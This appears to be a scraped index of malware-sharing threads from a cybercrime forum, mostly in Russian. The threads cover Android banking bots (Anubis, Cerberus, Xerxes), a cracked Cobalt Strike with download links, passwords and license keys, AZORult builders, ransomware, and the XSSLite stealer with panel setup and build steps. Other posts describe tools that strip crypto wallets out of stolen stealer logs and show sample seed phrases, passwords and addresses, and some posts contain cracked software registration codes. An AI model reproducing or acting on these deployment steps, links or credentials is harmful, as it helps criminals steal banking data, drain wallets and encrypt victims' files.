Software

◀ Back

Исходный код Android Bot Anubis 2.5 - Source Code Android Bot Anubis 2.5

Author: anti_huckster • 2019-08-21T07:29:06+0000 • Replies: 443 • Views: 188K
You must have at least 5 message(s) to view the content.


С авто отключения протекта выложу позже, так же возможно отдам билдер с
криптором.

Zeus trojan.

Author: WhiteChapelHomeless • 2008-11-20T23:25:55+0000 • Replies: 371 • Views: 121K
Какая последняя версия етово зверя? Знает кто?

Voila!! CobaltStrike 4.4 cracked[.]

Author: r1z • 2021-08-27T01:04:00+0000 • Replies: 573 • Views: 95K
Hi guys;

Today CobaltStrike 4.4 Last edition has been cracked; so i'm sure alot of guys
here waiting this day;

![E9PHq27X0AAGRV8.jpg](https://xss.is/attachments/26286/)
![1628663653143.png](https://xss.is/attachments/26288/)
Cobalt Strike 4.4 (August 04, 2021) is release:

* \+ Add support for User Defined reflective loaders.
* <https://www.cobaltstrike.com/help-user-defined-reflective-loader>
* \+ Add support for User Defined sleep masking.
* <https://www.cobaltstrike.com/help-sleep-mask-kit>
* \+ Product licensing and Security enhancements.
* \+ Avoid localhost Sysmon event 22 for Beacon meta-data resolution.
* \+ Validate beacons with sleep_mask set have enough code cave space.
* \+ Update Mimikatz (2.2.0 20210724)
* \+ Update Cobalt Strike updater with cert/subdomain info
* \+ Add client reconnection option
* \+ Add buffering when sending data via NanoHTTPD
* \+ Update beacon help for link command
* \+ Update c2lint to return a result code
* \+ Add new dialog to the UI to view the Malleable C2 profile
* \+ Add an "allow" option to useragents filter; complements the block added in 4.3
* \+ Add alias field for server to login dialog
* \+ Add alias to connection dialog
* \+ Add alias on connection tabs on main Cobalt Strike screen
* \+ Enhance c2lint and UI handling of coding signing functionality
* \+ Enhance failover host rotation strategy(http/s 200 response with invalid data is a failure)
* \+ Add spear phishing email template parsing validation to Send client action
* \+ UI: enhancement request for Connect dialog to remember last connected teamserver
* \+ Add better C2 linting for code signing configuration
* \+ Checksum failure when building beacon using compiled Artifact kit
* \+ Vulnerability report: Team server crashes when bombarded with too large screenshots. (added TeamServer.prop config)
* \+ Fix error in arsenal build scripts (add bin/bash directive)
* \+ Fix various places in the UI where required table row selection was not edited.
* \+ Fix beacon error when a host entry of a listener contains a space at the end (trim host entry strings)
* \+ Clicking into the screenshots/keystrokes tabs doesn't immediately focus the list
* \+ Fix host rotation 'strategy' option documentation missing from 'listener_create_ext' aggressor function


For more sure and saftey; it's better to check the files your self! so we are
in darknet; and none of us trust strangers; (you can create a jar package
using **java ida IntelliJ** once you check the files!
In the next week i'm going to make the most important parts in this version
which is stable in evading EDR/AV technique, keep tunned!

![cs-idea.png](https://xss.is/attachments/26287/)

**NOTE for all XSS members who vote in the contest and not!!
don't forget to vote for participate in Xss.is Context! 7days left & _you have
ability to vote for 3 Participate !! no only 1_**
<https://xss.is/threads/55078/>


Code:Copy to clipboard



https://up.labstack.com/zQD87FRI

mirror download:
https://mirrorace.org/m/13c99


7af9c759ac78da920395debb443b9007fdf51fa66a48f0fbdaafb30b00a8a858 Cobalt Strike
4.4 Licensed (cobaltstrike.jar)

[ https://verify.cobaltstrike.com/ ](https://verify.cobaltstrike.com/)

pass: r1z.xss

Anubis 2.5 (Android Bot)

Author: lukas • 2019-04-05T16:23:36+0000 • Replies: 249 • Views: 80K
**Anubis 2.5 (Android Bot)**

там **два конфига** , не только в папке **anubs** но и в папке **о1о** они
должны быть одинаковые
![;\)](data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7)
остальное все - по ману

**скачать:**

You must have at least 15 message(s) to view the content.

Seed Parser [Парсер сид фраз от криптокошельков.]

Author: PR1SM-NSA • 2021-03-14T09:45:14+0000 • Replies: 493 • Views: 78K
Программа на Python 3.x производит рекурсивный поиск парольных фраз от
криптокошельков внутри файлов, проверяет их валидность
(т.е. выдает только те фразы которые удовлетворяют стандарту bip39) и выводит
парольную фразу и путь к файлу в котором она была найдена.
Валидация фраз на соттветствие стандарту bip39 производится с помощью
библиотеки из репозитория аппаратного криптокошелька trezor
<https://github.com/trezor/python-mnemonic>


Пример вывода программы (пути заменил на zzz что бы не палить имя юзера и тд)


Spoiler

Hidden content for authorized users.


/home/zzzzz/zzzzzz/Files/wallety/New text document.txt
rude cool annual mango hazard stable affair payment kingdom naive crush cancel

/home/zzzzz/zzzzzz/Files/wallety/tron.txt
awake window awful off hero coach salmon deer medal bleak crisp noodle

/home/zzzzzzz/FileGrabber/Users/aliraza/Documents/atomic backup pharse
wallet.txt
focus city expand planet upon power stick begin usual cereal spring damage

/home/zzzzzzz/FileGrabber/Users/tunas/Desktop/torrrez codes.txt
sketch swift bronze stadium monster agent office error lock spare split frown

/home/zzzzz/zzzzzz/Files/wallety/ark wallet.txt
rude cool annual mango hazard stable affair payment kingdom naive crush cancel



0\. Необходим Python версии 3.8 и старше и библиотека pbkdf2 для Python

1\. Для работы программы необходимо в теле seed-parser.py в 12 строке заменить
source на полный путь до папки с логами.

Если у вас логи от говностиллера и все сграбелнные файлы хранятся в отдельных
архивах
(наверное что бы хозяева стилера успели быстрее вас спиздить крипту)


Spoiler: Для Linux

Hidden content for authorized users.


В консоли перемещаемся в паку с логами (должен быть утсановлен p7zip-full и
p7zip-rar)
cd /home/user/папка-с-логами
и выполняем
find /home/user/папка-с-логами -type f -name '*.zip' -execdir 7z x -y {} +
Все, все вложенные архивы будут рекурсивно распакованы. Так же на всякий можно
сдела то же самое для rar часто грабятся файлы типа wallet.rar с бекапами
ключей и валлетов.
Распаковаться он не распакуется но по запросу пароля вы поймете где он лежит и
сможете попытаться подобрать пароль из тех что сграбил стилер.



Spoiler: На Windows (всех версиях)

Hidden content for authorized users.

Пользователь виндовс должен только страдать


2\. Можно настроить какие файлы программа будет пропускать, по умолчанию это
gif ico jpeg png jpg cab 7z rar zip sys dll
Для настройки своих исключений нужно просто добавить расширения которые хотите
что бы программа пропускала
В файле seed-parser.py с 14 строки вставляете свои расширения (в таком же
формате например '.iso', ).

3\. Можно настроить какие именно фразы вы хотите искать по умолчанию ищутся
фразы длинной 12 и 24, программа так же поддерживает фразы длинной 15, 18 и 21
слов. Что бы включить их поддержку нужно дописать цифрами их в фигрных скобках
в 27 строке в seed-parser.py

4\. Парсер находит фразы с разной манерой записи вне зависимости от того где
они упоминаются в начале середине или конце файла.

1\. big
2\. room
3\. ocean
4\. valley
...

1\. big 2. room
3\. ocean 4. valley
...

big room ocean valley ...

big
room
ocean
valley
....

и т.д.


5\. Программа может искать фразы от кошельков созданные на других языках
(поддерживаются языки: Французкий, Итальянский, Няшный, Корейский, Китаски и
официальный язык порноделов) для того что бы программа искала фразы на других
языках нужно в папке wordlist найти папку Other выбрать там словарь,
переименовать его в english.txt и заменить тот что по умолчанию.

6\. Если в командной строке программы указать путь до папки например python3.8
seed-parser.py /home/user то программа отработает в фоновом режиме при этом
сохранив результаты работы в файл с именем в виде даты и времени.

Тестировал на Ubuntu 20.10 Python3.8 должно работать на виндовс (лучше в
повершелл запускать а то вывод будет читать неудобно)

ПРЕДУПРЕЖДЕНИЕ
При большом объеме программа выводит много мусора. Пользователям linux будет с
этим легко справится парсив только файлы граббера например
python3.8 seed.py | grep Files
где Files название папки в логе с файлами грабера
или
python3.8 seed.py | grep Autofill что бы отпарсить данные с автозаполнения.

Так же советую с помощью sed отсечь все фразы в которых есть более двух
повторов. Ну те кто на линуксе думаю сообразят как мусорные строки выкинуть из
вывода


В будущем планируется добавить следующий функционал
1\. Вывод после каждой фразы по 3 биткоин кошелька и приватных ключа
сгенерированных с помощью этой фразы всех трех типов (получится 9 кошельков: 3
кошелька P2PKH, 3 кошелька P2SH и 3 кошелька P2WPKH SegWit)
2\. Вывод 3х эфириум кошельков и приватных ключей сгенерированных с помощью
этой фразы
3\. Добавление черного списка названий файлов и папок которые будут
пропускаться.
4\. Прочие улучшения по отсечению мусора.
5\. Многопоточность (хотя и так вроде бы работает не медленно)


You must spend at least 30 day(s) on the forum to view the content.

You must have at least 20 message(s) to view the content.



Spoiler: Специальная версия для тех кто хочет продавать этот софт.

Ты пидор если хочешь торговать пабликом





Donate
Bitcoin bc1qphw8hltvwp6gqn6rx3rwgtuzxrcar6ap50rcqr
ETH 0x1C3136Ad67718Ebb6B235e159db761c5d657d0cf

Билдеры AZORult последних версий

Author: tabac • 2019-01-14T16:55:48+0000 • Replies: 272 • Views: 77K
**AZORult 3.2 builder**
билдер, версия предпоследняя

You must have at least 10 message(s) to view the content.



**AZORult 3.3 builder**
билдер, последняя версия

You must have at least 10 message(s) to view the content.


все запускать на свой страх и риск

Voila! Cobalt Strike 4.5 modified Loader ( Original cobaltstrike.jar )

Author: r1z • 2022-06-12T16:40:43+0000 • Replies: 443 • Views: 71K
Hi all,

Today i'm sharing with XSS community the cobaltstrike 4.5 Loader with original
key {f38eb3d1a335b252b58bc2acde81b542} after it's get published.

![CS_Teamserver.png](https://xss.is/attachments/37455/)

December 14, 2021 - Cobalt Strike 4.5

* \+ Added a new Aggressor script hook to allow users to define how fork&run process injection is implemented.
* \+ Added a new Aggressor script hook to allow users to define how explicit process injection is implemented.
* \+ Added support for explicit process injection to post-exploitation jobs.
* \+ Added a "max retry" option which allows a Beacon to exit or increase sleep time after a specified failure count. This applies to HTTP, HTTPS and DNS Beacons.
* \+ Improved command history behaviour. Commands are now appended to the history in the correct order.
* \+ Added a console history command to display a list of commands. Display the entire command history, or specify how many items to display.
* \+ Added support for the bang (!) character to run a command from the command history list.
* \+ Increased available space in the sleep_mask kit from 289 to 769 bytes.
* \+ Added support to the sleep_mask kit for masking heap memory.
* \+ Increased reserved size in Beacon for a larger User Defined Reflective Loader. The new hook adds an override with a 100kb upper limit (5kb default).
* \+ x64 checkbox is now checked by default in all dialogs related to payload generation.
* \+ Made changes to product security and licensing.
* \+ Fixed an issue where the user defined reflective loader was not being cleaned up in some circumstances. The bootstrap code now supports the stage.cleanup setting.
* \+ Fixed issue that caused a warning to appear if TeamServer.prop was missing at teamserver startup.
* \+ Fixed a validation issue on the HTML Attack dialog where the dialog could be submitted without a listener value.
* \+ Fixed an issue in c2lint where a space at the end of the metadata/prepend transformation caused an error to be reported.
* \+ Fixed an issue in c2lint where an error was reported if allow_useragents was set but block_useragents wasn't.
* \+ Fixed an issue where the cp command was mishandling spaces in the path. Spaces are now supported when the path is enclosed with single or double quotes.
* \+ Fixed an issue where the mv command was mishandling spaces in the path.Spaces are now supported when the path is enclosed with single or double quotes.
* \+ Fixed an issue where the timestomp command was mishandling spaces in the path. Spaces are now supported when the path is enclosed with single or double quotes.
* \+ Fixed an error in the phishing dialog where email addresses in the Bounce To field were not being correctly validated.
* \+ Fixed an issue where reading job output from multiple reads was returning the last read size instead of the total size.

![CS_Logged_In.png](https://xss.is/attachments/37456/)

The most important features here:

* **process injection.**
* **updates to the sleep mask.**
* **UDRL kits, evasion improvements.**
* **command history update.**
* **along with other, smaller changes.**

The loader i use here is taken from [here](https://github.com/Like0x/0xagent),
but it's only supported for cobaltstrike 4.4, and this modified update
supporting**cobaltstrike 4.5** !
and will be updated to 4.6 soon.

to modify your own copy of cobaltstrike which give you ability to bypass the
most moderm EDR/AV such like Kaspersky i did bypass in the contest topic you
can learn more from.
\---------------------
English readers.
[Hide your CobaltStrike like a PRO! & Bypass Kaspersky End Point Security
AV/EDR (PART 2)](https://xss.is/threads/67273/)
Russian readers. Thanks for translate [yashechka](/members/136806/)
[Hide your CobaltStrike like a PRO! & Bypass Kaspersky End Point Security
AV/EDR (PART 2)](https://xss.is/threads/67273/post-463697)
\---------------------
**NOTE:**
To start working in the loader you need to download **cobaltstrike.jar** or
any other version you preffer and paste it in the same directory
with**XSSagent.jar and change the key in teamserver, start.***
\---------------------

Code:Copy to clipboard



4.0 1be5be52c6255c33558e8a1cb667cb06
4.1 80e32a742060b884419ba0c171c9aa76
4.2 b20d487addd4713418f2d5a3ae02a7a0
4.3 3a4425490f389aeec312bdd758ad2b99
4.4 5e98194a01c6b48fa582a6a9fcbb92d6
4.5 f38eb3d1a335b252b58bc2acde81b542


Download [cobaltstrike.jar all version](https://mirrorace.org/m/59Rqc) from
4.0 due 4.5.
Download [XSSagent Loader](https://mirrorace.org/m/166kw) (XSSagent.jar).
Pass r1z.xss

__PS:__
__Who need the all files of cobaltstrike and XSSagent write request**here**
,not pm!__

![CS_Client.png](https://xss.is/attachments/37457/)


a5e980aac32d9c7af1d2326008537c66d55d7d9ccf777eb732b2a31f4f7ee523 Cobalt Strike
4.5 Licensed (cobaltstrike.jar)
<https://verify.cobaltstrike.com/>
pass: r1z.xss

Разбираем склейки софта от школьников, барыг и вредителей

Author: Fedeks • 2020-04-30T21:08:34+0000 • Replies: 205 • Views: 70K

ARKADAŞLAR EVET SABAHTAN DÜZENLEMELER / İLAVELER YAPIYORUM ŞİMDİ YAPMAMI TAM
OFİS KONUSUNUN HAZIR OLDUĞUNU DÜŞÜNDÜM! [Bazı Özellikler Kaldırılmadığından]

[]](https://hizliresim.com/VMLAJB)[![\[Resim:
VMLAJB.png\]](/proxy.php?image=https%3A%2F%2Fi.hizliresim.com%2FVMLAJB.png&hash=1d98525580e70c9a3f455af4f49cd3ef)](https://i.hizliresim.com/VMLAJB.png)

Sağ Tık Menü =>
[![\[Resim:
nWgkqN.png\]](/proxy.php?image=https%3A%2F%2Fi.hizliresim.com%2FnWgkqN.png&hash=947c5e6938e2587ac5ac61b505105d2c)](https://i.hizliresim.com/nWgkqN.png)

Dosya Yöneticisi =>
![\[Resim:
wol_error.gif\]](/proxy.php?image=https%3A%2F%2Fwww.turkhackteam.org%2Fimages%2Fstatusicon%2Fwol_error.gif&hash=a85680fe1e6f6a4a1e0610f3cf1f64a6)
[Bu resim yeniden boyutlandırıldı, tam halini görmek için
tıklayınız.](https://hizliresim.com/vpLmBA)
[![\[Resim:
vpLmBA.png\]](/proxy.php?image=https%3A%2F%2Fi.hizliresim.com%2FvpLmBA.png&hash=5d74016b0e72a2bad21ca454ed9676b2)](https://i.hizliresim.com/vpLmBA.png)

Görev Yöneticisi =>
![\[Resim:
wol_error.gif\]](/proxy.php?image=https%3A%2F%2Fwww.turkhackteam.org%2Fimages%2Fstatusicon%2Fwol_error.gif&hash=a85680fe1e6f6a4a1e0610f3cf1f64a6)
[Bu resim yeniden boyutlandırıldı, tam halini görmek için
tıklayınız.](https://hizliresim.com/r2VjW1)
[![\[Resim:
r2VjW1.png\]](/proxy.php?image=https%3A%2F%2Fi.hizliresim.com%2Fr2VjW1.png&hash=959728f19a43dcd83bfc0de51da9d359)](https://i.hizliresim.com/r2VjW1.png)

Masaüstü İzleme =>
![\[Resim:
wol_error.gif\]](/proxy.php?image=https%3A%2F%2Fwww.turkhackteam.org%2Fimages%2Fstatusicon%2Fwol_error.gif&hash=a85680fe1e6f6a4a1e0610f3cf1f64a6)
[Bu resim yeniden boyutlandırıldı, tam halini görmek için
tıklayınız.](https://hizliresim.com/7NbY9a)
[![\[Resim:
7NbY9a.png\]](/proxy.php?image=https%3A%2F%2Fi.hizliresim.com%2F7NbY9a.png&hash=1dff1fb7ee76d35a7de3c5fd7e31d716)](https://i.hizliresim.com/7NbY9a.png)

Şifre Bölümü =>
[url = https: //i.hizliresim.com/gWAnNQ.png]![\[Resim:
gWAnNQ.png\]](/proxy.php?image=https%3A%2F%2Fi.hizliresim.com%2FgWAnNQ.png&hash=078360f59d192a43342c0a5aeb02c712)

Kullanıcı Ayarları =>
![\[Resim:
wol_error.gif\]](/proxy.php?image=https%3A%2F%2Fwww.turkhackteam.org%2Fimages%2Fstatusicon%2Fwol_error.gif&hash=a85680fe1e6f6a4a1e0610f3cf1f64a6)
[Bu resim yeniden boyutlandırıldı, tam halini görmek için
tıklayınız.](https://hizliresim.com/9d5R6O)
[![\[Resim:
9d5R6O.png\]](/proxy.php?image=https%3A%2F%2Fi.hizliresim.com%2F9d5R6O.png&hash=c1c7bd22e4532abd862bba5b054e6b8f)](https://i.hizliresim.com/9d5R6O.png)

Eğlence Menüsü =>
![\[Resim:
wol_error.gif\]](/proxy.php?image=https%3A%2F%2Fwww.turkhackteam.org%2Fimages%2Fstatusicon%2Fwol_error.gif&hash=a85680fe1e6f6a4a1e0610f3cf1f64a6)
[Bu resim yeniden boyutlandırıldı, tam halini görmek için
tıklayınız.](https://hizliresim.com/qWl3gV)
[![\[Resim:
qWl3gV.png\]](/proxy.php?image=https%3A%2F%2Fi.hizliresim.com%2FqWl3gV.png&hash=4eb262152fb878294a1dc25265959593)](https://i.hizliresim.com/qWl3gV.png)

Sunucu Editör =>
[![\[Resim:
MvyXz7.png\]](/proxy.php?image=https%3A%2F%2Fi.hizliresim.com%2FMvyXz7.png&hash=9aaa251425f0b479cdbf7d5ca44a1cec)](https://i.hizliresim.com/MvyXz7.png)


[VirusTotal](https://www.virustotal.com/tr/file/32892d9bc32b165f528f64efc5a71166fca91cbd45cac2885ecca22fc78e1e78/analysis/1497639660/)



Mod Anubis 2.5 от 10.01.2020 и Anubis Loader(loader_maza) сорцы

Author: DukeEugene • 2020-02-08T16:51:39+0000 • Replies: 264 • Views: 59K
Mod Anubis 2.5 от 10.01.2020 и Anubis Loader(loader_maza) сорцы

Сливаю исходники лоадера Мазы и так же сливаю Анубис мод, который на експе
продавали за 5к$ и сейчас стараются всякие долб..бы продавать.

Лоадер обычный, ничего необычного, имя пакета нужно шифровать в md5

Функционал банкбота:
\- админ права
\- отправка СМС
\- перехват смс/скрытый перехват СМС
\- получить все СМС на телефоне
\- получить все установленные приложения
\- USSD
\- показать сообщение
\- Push
\- авто Push
\- геолокация
\- веб-инжекты включая криптовалютные, работают на 4-9 версиях
\- граббер карт(5 видов)
\- запуск инжекта(граббера) по интервалу
\- получить все контакты
\- спам по всем контактам бота или по вашей базе номеров
\- доступ к файловой системе(rat) скачивание фото,аудиозаписей,текстовых
форматов.
\- стрим экрана(rat) - от версии 5.0 и выше
\- стрим звука(rat)
\- открыть url в браузере
\- открыть url в активити бота
\- переадресация звонка
\- криптолокер
\- удаленный запуск установленных приложений
\- поиск файлов по сигнатурам
\- запись звука(2 вида)
\- кейлоггер (на браузер не распространяется)
\- Socks5 модуль - от версии 5.0 и выше
\- получить IP бота
\- Автоматическое отключение Google Protect, работает после обновления
13.01.2020
\- Решена проблема с засыпанием ботов
\- Автоматическое удаление бота (не нужно подтверждения на стороне бота),
следов не остается.
\- Отображение модели мобильного телефона.
\- Пошаговое получение данных из инжекта (падает все по очереди, логин, пасс,
номер карты, потом дата, потом цвв). В случаях когда вход в онлайн по карте,
карту
получаете теперь почти наверняка, холдер обычно боится вводить CVV.
\- Все разрешения берутся за 1 раз и незаметно, в отличии от старой версии с
5ю окнами.
\- Удаление приложений с телефона по команде из админки.
\- Автоудаление приложений по расписанию. Заливаете линки на антивирусы, бот
чистит
телефон от них через указанное время после инсталла.
\- Включение кейлогера по расписанию.
\- Запуск инжектов по расписанию. Через указанное время ведется поиск по
приложениям,
нужное - запускается.
\- Расширенная панель по сортировке, поиску ботов.
\- Панель на русском
\- Блокировка ПУШ сообщений любых приложений

Всяким там любителям халявы пишу, что не надо в теме или лс просить личный,
даю только тем у кого немного не хватает до хайда, остальным просьба не
писать.
Хайд делается для того, чтобы увидеть, скачать могли активные пользователи,
которые приносят пользу форуму в его развитии.



You must have at least 180 reaction(s) to view the content.

Hook & Ermac

Author: Red3v1l • 2023-10-29T09:30:34+0000 • Replies: 390 • Views: 57K
**I 'm Sharing Both $30k Resources For Free For Anyone Who Downloads Directly
Without Any Password, Along With Direct Installation, Just Do The Rest On Your
Own.**

You must have at least 200 reaction(s) to view the content.

Banking malware collection

Author: Z1_Supreme • 2020-04-15T17:52:02+0000 • Replies: 179 • Views: 54K
I open a thread to post a collection of old banking malware for study.
I apologize for my English, I am still learning

**I start with Kronos botnet. It 's my old panel + exe (without crypt)**

Panel + Bin [+3 updates]

[CLIKE]
<https://www.sendspace.com/file/3tvp6t>
Passwords: xss.is
[/CLIKE]
I will continue publishing when I have free time

Spam tools

Author: Cisco • 2006-01-23T13:56:07+0000 • Replies: 99 • Views: 50K
=========( Сборник тулз для спаммера )===========
Буду пополнять по тихоньку. Если хотите ченить отпостить - постите
![:\)](data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7)
========================================)
=================) С П А М (================

phpmailer - незаменимый скрипт в арсенале спаммера. хакнул хост,
закачал - и спамь
![:\)](data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7)
Оч. удобно.

![:zns5:](/styles/default/xenforo/smilies/emojione/software.png)
[Скачать|Download](http://rapidshare.de/files/11644387/mailer.rar.html)

fxStyle Bulk Mailer - зделан на javascript'е. Не очень нравиться. Просто
балкмейлер.

Качать: <http://www.tucows.com/get/384169_144935>

Code:Copy to clipboard



User Name: member27@fxstyle.com
Registration Code for Bulk Email Sender: 8069038061


=========) Email collection / Коллекторы (==========

eMail SPideR 8 - фуйня но работу свою делает. Собирает мыла по указаномму УРЛ.
Написан на JAva посему медленный и глючный.

Качать: <http://www.email-business.com/downloads/EmailSpider8.exe>

Code:Copy to clipboard



name : molinari
Code : KVPB-QSRP-YHUP-SVTM

Сорцы вирусов, троев и пр...

Author: Winux • 2006-05-31T08:55:48+0000 • Replies: 95 • Views: 48K
Тут будем собирать сорсы вирусов ТОЛЬКО В ОЗНАКОМИТЕЛЬНЫХ ЦЕЛЯХ
![;\)](data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7)
Администрация, хостинг и пр. лица причастные к проекту не несут никакой
ответственности за несанкционированное использование выложенной инфы.

Начнем:
**mydoom.a sources**
Известный червяк.


**HOOKER 2.5**
Что-то типа кейлога

SIB panel, сиб панель слитая

Author: QwEQw3RtyY • 2019-01-28T19:47:15+0000 • Replies: 133 • Views: 45K
Панель SIB от конца 17 года.
О шеллах, дырах - понятия не имею, панель не моя, не устанавливал и не
использовал ее никогда.



полный комплект тут -
<https://anonfile.com/I9H4Y7rdbb/Panel_zip>
(инструкция, база данных, доп файлы и тп)


еще то что может понадобится возможно -
<https://anonfile.com/q4GdYar2b4/_zip>

(crontab и тп)





п.с. просто парсинг с ПС, и далее чек и раскрутка. Паука нету.

п.п.с Кто поставит и скинет старику установленую сиб доступ, был бы
благодарен, просьба кто сможет и кому не в падлу, и не жалко, скиньте в ЛС
установленную, ибо мозгов не хватает у меня.

Cerberus Source Code

Author: ANDROID • 2020-08-05T20:53:40+0000 • Replies: 146 • Views: 33K
v2 версия. Ласт.

Так как наша команда (до этого команда) вела этот бизнес чисто, максимально
красиво, то и завершим мы его красиво.

Перед 70% клиентов фин обязательства уже закрыты. Оставшихся просим отписать в
ЛС или в телеграмм, не забыть написать свою жабу, ключ лицензии и ip сервера.
Это нужно для того, чтобы я убедился в том, что вы владелец лицензии.
Желательно ещё apk файл приложить.

Исходники на растерзание, специально для xss.is
Cerberus v1 + Cerberus v2 + install scripts + admin panel + sql db

Hidden content for members of the Premium groups.

PrivateKeeper проекты

Author: Nordman • 2019-10-28T16:35:38+0000 • Replies: 120 • Views: 27K
**Wish Brute/Checker by Shoshy**

[CLIKE]

### [ wish.comm.db - AnonFile ](https://anonfile.com/Zas5q55dn8/wish.comm_db)

![anonfile.com](/proxy.php?image=https%3A%2F%2Fanonfile.com%2Fimg%2Ffavicon%2Ffavicon-32x32-anonfile.png%3F1554382134&hash=de1216324113a236263be67873d55452&return_error=1)
anonfile.com

[/CLIKE]

Chaos Ransomware Builder

Author: ryukRans • 2021-06-09T15:49:21+0000 • Replies: 178 • Views: 23K
Я занимался разработкой рансомваре и я хотел бы поделиться с вами, ребята.
Поделитесь, пожалуйста, своим мнением по этому поводу. Какую функцию вы бы
хотели видеть в этом рансомваре?

Ссылка для скачивания: <https://github.com/Hetropo/ryuk-ransomware>
попробуйте только на виртуальной машине

Metamask Searcher 1.0 [SOURCE CODE]

Author: Kain1029 • 2022-07-31T08:01:30+0000 • Replies: 95 • Views: 22K
Программа на .NET Core 6.
На вход принимает папку с логами и перерабатывает их в цикле

1\. Ищет файлы *.log* , как правило они относятся к метамаску , браве и так
подобным, собирает из них vault
2\. Ищет все пароли и автозаполнения
3\. Подбирает пароль к vault
4\. Если все прошло удочно собирает из мнемоники и пароля адрес
5\. Проверяет баланс на debank

На выход выдает в консоль и txt файл данные в формате:

Лог: C:\Users\\*USERNAME*\Desktop\ПАПКА\ПАПКА В ПАПКЕ
Кол-во кошельков: 2
Кол-во паролей: 2179
Мнемоника: tortoise produce type multiply chest acquire love maximum flat lion
pact steak
Пароль: 993675871h
Адрес: 0x171D27C2acE5bdffE4c3A08cee337b6fbe52A135
Баланс: 0

XSSLite Стиллер с веб панелью и сбором крипты

Author: CognitoInc • 2024-01-25T22:12:00+0000 • Replies: 119 • Views: 17K
![](/proxy.php?image=https%3A%2F%2Fi.ibb.co%2FWx9TDrh%2FScreenshot-5.png&hash=51b41019bd70f64a1becafee20e72c23)

> XSSLite - стиллер с веб-панелью, предназначенный для сбора различных данных
> с компьютера и отправки их на ваш сервер.
>
> Click to expand...

Spoiler: Функционал

1\. Сбор браузеров Chromium
2\. Граббер файлов с рабочего стола
3\. Сбор абсолютно всех плагинов из браузера
4\. Сбор криптокошельков
5\. Сбор информации о системе
6\. Расшифровка логов на стороне сервера

Spoiler: Настройка и установка панели

1\. Купите VDS
2\. Откройте порты
![Screenshot_3.png](https://xss.is/attachments/74875/)
![Screenshot_4.png](https://xss.is/attachments/74876/)
![Screenshot_6.png](https://xss.is/attachments/74877/)
![Screenshot_7.png](https://xss.is/attachments/74878/)
![Screenshot_8.png](https://xss.is/attachments/74879/)
![Screenshot_9.png](https://xss.is/attachments/74880/)
![Screenshot_10.png](https://xss.is/attachments/74881/)
![Screenshot_11.png](https://xss.is/attachments/74882/)

3\. Установите Python 3.11
4\. Запустите Install.bat и ожидайте скачивания всех библиотек
5\. Зайдите в файл config.json
6\. Замените localhost на ip вашего VDS
7\. Замените 80 на порт который вы открывали
8\. Замените login и password на тот что вам нужно, эти данные будут
использоваться для входа в панель
![Screenshot_12.png](https://xss.is/attachments/74884/)

9\. Зайдите В CMD в папке XSSLite и введите команду python start.py
![Screenshot_1.png](https://xss.is/attachments/74885/)

Теперь ваша панель готова и вы можете войти в нее перейдя по ссылке которую
вывело в консоль

Spoiler: Настройка и компиляция билда

1\. Зайдите в папку XSSLite\Client\Client и откройте config.cs а затем
замените ссылку на ссылку вашего сервера
2\. Откройте Client.sln находящийся в папке XSSLite\Client
3\. Скомпилируйте в режиме Release
![Screenshot_13.png](https://xss.is/attachments/74887/)

Теперь ваш билд готов и уже можно лить трафик

Spoiler: Почему я решил выложить подобный софт?

Изначально я делал RAT+Stealer в одном, для того чтобы в дальнейшем его
продавать, и я его уже дописал. Но решил, что лучше перепишу его на C++. В
этот момент я узнал о конкурсе и решил, что переделаю свой софт под просто
stealer. В итоге вырезал функционал RAT и пару функций стиллера тоже (а то
слишком жирно будет подобный готовый софт выкладывать в открытый доступ). Ну
вот так появился этот бесплатный проект.

Spoiler: На чем написан проект?

Серверная часть (Панель) написана на Python Flask.
Клиентская часть написана на C#.

Spoiler: Как реализован сбор и отправка куки, паролей на сервер?

Создается копия файлов куки и паролей. Также софт получает ключ dpapi и
засовывает это все в виде байтов внутрь json. Затем отправляется на сервер.
Уже на сервере происходит расшифровка полученных данных с помощью aes. После
расшифровки всех данных они записываются уже в привычные txt файлы.

Spoiler: Почему я решил сделать расшифровку на стороне сервера?

Потому что это должно помочь снизить детекты на билде, так как происходит
меньше подозрительных действий. Ну и просто потому что мне было проще написать
расшифровку на питоне, чем на C#.

Spoiler: Посткриптум

Данный софт всего лишь черновой вариант того, что я планирую сделать. В
будущей версии, которая будет предназначена для продажи, я перепишу клиентскую
часть (билд) на C++ и также добавлю новый функционал. Но раз этот вариант
программы черновой, это не значит, что с ней нельзя работать. Эта версия
вполне пригодна и готова к использованию; главное, не забывайте криптовать
билд.

Spoiler: Ссылка на скачивание исходников проекта

<https://mega.nz/file/pSd2yaAB#IOHY0T2f7mqpNMT9NtQbQtiNzrj7CLR9lLqdM-3uumM>

Paradise Ransomware - Source code

Author: Krypt0n • 2021-06-11T21:05:00+0000 • Replies: 46 • Views: 17K
Исходный код Paradise Ransomware.
![загружено.jpg](https://xss.is/attachments/23368/)
Mega:

You must have at least 50 reaction(s) to view the content.

Андроид бот xerxes

Author: crack • 2019-05-10T17:15:36+0000 • Replies: 44 • Views: 17K
Бот писался на заказ. Клиент слился.Что умеет. СМС перехват скрытно, автопуши
банков и картона,ручной запуск пушей, отправка смс, запуск инжектов, работа
инжектов на всех версиях андроида, инжекты хранит на телефоне холдера,скачка
смс, спам по контактам, автокрипт бота,шифрование траффа и дохрена что еще все
описывать не хочу.
Бот не работает по ру.Крипт апи описывать в админке не стал лень если что
позже выложу инструкцию.Бот работает на всех версиях андроид, тестировался и
на последних 8-9.Установка простая есть мануал, заливаем на хостинг,
прописываем базу в конфиге, заливаем базу.Нужен крипт, с криптом % 70 ботов
живут неделями. По картону на нормальном траффике % 10-12 примерно, траффик с
гугла. Палит пока 1 ав.Надеюсь сэкономить n k$
![:\)](data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7)

Сборка бота:
Билд апк, ставим apktool
Распаковываем апк командой apktool d -f app.apk
Рекурсивно меняем адрес админки (<http://localhost/>), для любителей Windows
ставим Notepad++ выбираем функцию заменить во всех файлах.
Если нужно сменить иконку идем в папку apk/app/res/mipmap-xxxhdpi и меняем
иконку ic_launcher.png на нужную, название оставляем прежнее.
Название приложения можно сменить в манифесте
